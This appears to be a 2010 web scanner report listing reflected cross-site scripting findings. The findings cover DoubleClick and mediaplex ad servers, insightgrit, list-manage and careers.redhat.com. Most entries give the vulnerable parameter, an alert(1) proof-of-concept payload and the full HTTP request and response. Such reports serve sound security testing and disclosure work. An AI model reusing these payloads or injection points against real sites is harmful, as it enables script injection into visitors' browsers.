document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /280%3B39025848/39043606/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle919b0"-alert(1)-"47f06942a38&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d759f'-alert(1)-'26bb58939a1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /280%3B39025845/39043602/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddled759f'-alert(1)-'26bb58939a1&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e2d2'-alert(1)-'8bc2132a1be was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b1e2d2'-alert(1)-'8bc2132a1be&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c3cf"-alert(1)-"2797ce68773 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b9c3cf"-alert(1)-"2797ce68773&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46242"-alert(1)-"4c02dbc8d53 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e346242"-alert(1)-"4c02dbc8d53&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "nev ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e338'-alert(1)-'16742ae9f75 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e31e338'-alert(1)-'16742ae9f75&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f835"-alert(1)-"d4361fd75fc was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick3f835"-alert(1)-"d4361fd75fc&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25932'-alert(1)-'7a4e7340a55 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick25932'-alert(1)-'7a4e7340a55&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df5cf"-alert(1)-"cabd323b909 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6425
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073df5cf"-alert(1)-"cabd323b909&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36d88'-alert(1)-'b2fe71d3c54 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207336d88'-alert(1)-'b2fe71d3c54&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2742c'-alert(1)-'b4a024bcc9a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/10c/%2a/s%3B231651615%3B2-0%3B0%3B55718902%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2742c'-alert(1)-'b4a024bcc9a&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b2d8"-alert(1)-"096a80d911b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/10c/%2a/x%3B231651615%3B3-0%3B0%3B55718902%3B4252-336/280%3B39025852/39043609/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto8b2d8"-alert(1)-"096a80d911b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i ...[SNIP]...
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d70c0'-alert(1)-'8fa323c2db8 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88c62'%3balert(1)//0a40d0aebfa was submitted in the mpvc parameter. This input was echoed as 88c62';alert(1)//0a40d0aebfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.92. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-11 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/js/11321-114995-1358-11
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158b3'%3balert(1)//1fd61cf7f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 158b3';alert(1)//1fd61cf7f60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db8f3'-alert(1)-'7aa45b5fe58 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f3e'%3balert(1)//2351d3570d4 was submitted in the mpvc parameter. This input was echoed as b0f3e';alert(1)//2351d3570d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.95. http://altfarm.mediaplex.com/ad/js/11321-114995-1358-12 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/js/11321-114995-1358-12
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7282'%3balert(1)//dabb31c2c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7282';alert(1)//dabb31c2c87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f00d"-alert(1)-"9ba223d4dfb was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 621f8"%3balert(1)//eb4cfdb33af was submitted in the mpvc parameter. This input was echoed as 621f8";alert(1)//eb4cfdb33af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.98. http://altfarm.mediaplex.com/ad/js/11921-102238-1358-0 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/js/11921-102238-1358-0
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bfdd"-alert(1)-"59ecd8958d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad/js/11921-102238-1358-0?8bfdd"-alert(1)-"59ecd8958d5=1 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo2=12109:16388/9966:3945; mojo1=s/47634/10; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; svid=804356890302;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c22f5"%3balert(1)//f53e72d2858 was submitted in the cid parameter. This input was echoed as c22f5";alert(1)//f53e72d2858 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234c22f5"%3balert(1)//f53e72d2858&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1 Host: app.insightgrit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 09:33:02 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=b9828d75a1f6c563c9b9161d81f0a25a; path=/ Set-Cookie: IG84196=84196%3A%3Ab9828d75a1f6c563c9b9161d81f0a25a%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 1246 Connection: close Content-Type: text/html
The value of the cta request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248b0"%3balert(1)//90365561f2b was submitted in the cta parameter. This input was echoed as 248b0";alert(1)//90365561f2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial248b0"%3balert(1)//90365561f2b&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1 Host: app.insightgrit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 09:33:03 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 15 Nov 2010 09:33:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=d8b92fbdd47650d83f91811bc30e7132; path=/ Set-Cookie: IG84196=84196%3A%3Ad8b92fbdd47650d83f91811bc30e7132%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:03 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 1246 Connection: close Content-Type: text/html
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef2"%3balert(1)//26cf77cb37d was submitted in the kw parameter. This input was echoed as 5bef2";alert(1)//26cf77cb37d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing5bef2"%3balert(1)//26cf77cb37d&adid=5624934659&cid=1234&lsd=Google&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1 Host: app.insightgrit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 09:33:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 15 Nov 2010 09:33:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=02f1d3d5df626107f402d4c973507e41; path=/ Set-Cookie: IG84196=84196%3A%3A02f1d3d5df626107f402d4c973507e41%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:01 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 1246 Connection: close Content-Type: text/html
The value of the lsd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdf8"%3balert(1)//c8bc67fd179 was submitted in the lsd parameter. This input was echoed as cbdf8";alert(1)//c8bc67fd179 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Googlecbdf8"%3balert(1)//c8bc67fd179&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1 Host: app.insightgrit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 09:33:02 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=261d3b1eb577eedbf319cb38751a65ba; path=/ Set-Cookie: IG84196=84196%3A%3A261d3b1eb577eedbf319cb38751a65ba%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 1246 Connection: close Content-Type: text/html
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 19f53<script>alert(1)</script>8e5491c7616 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /subscribe/post-json?u=daebe79d0098f97bb580d51a6&id=542001acb8&c=?19f53<script>alert(1)</script>8e5491c7616 HTTP/1.1 Host: boulevardr.us1.list-manage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Content-Length: 92 Connection: close Content-Type: application/json; charset=utf-8
?19f53<script>alert(1)</script>8e5491c7616({"result":"error","msg":"Unable to send mail. "})
The value of the Category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64 was submitted in the Category parameter. This input was echoed as b1c66"><img src=a onerror=alert(1)>a58178b7e64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ext/search?act=list&Keyword=jboss&Category=b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64&Location= HTTP/1.1 Host: careers.redhat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 16:11:26 GMT Cache-Control: private Content-Length: 50545 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDSSACDQST=DCDDAEJAIMGLODLBPBGPCBHA; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>redhat.com Careers</title> ...[SNIP]... <a href="/ext/search?act=list&Sortedby=SearchJobID&SortDir=Asc&Category=b1c66"><img src=a onerror=alert(1)>a58178b7e64&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius=" style="color:#ffffff;"> ...[SNIP]...
The value of the Category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c76"-alert(1)-"5322cc6fab2 was submitted in the Category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
